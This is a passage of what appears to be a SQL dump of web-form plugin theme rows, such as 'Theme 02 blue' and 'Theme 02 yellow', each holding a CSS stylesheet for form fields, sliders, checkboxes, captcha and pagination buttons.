margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(5,'Theme 02 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #ADC0DB;\r\nmargin-bottom: 10px;\r\ncolor: #ADC0DB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/01/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #708EB4;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #144077;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #708EB4;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #144077;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #285485;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #ADC0DB;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #C5C5C5;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size:18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n} \r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n	color: #2564A3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0E3F77;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #0e3f77; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0e3f77), color-stop(49%, #0f437d), color-stop(84%, #2f72b5), color-stop(99%, #165ba9)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #CCCCCC;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\nfont-size: 13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(6,'Theme 02 yellow','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EADEB4;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: 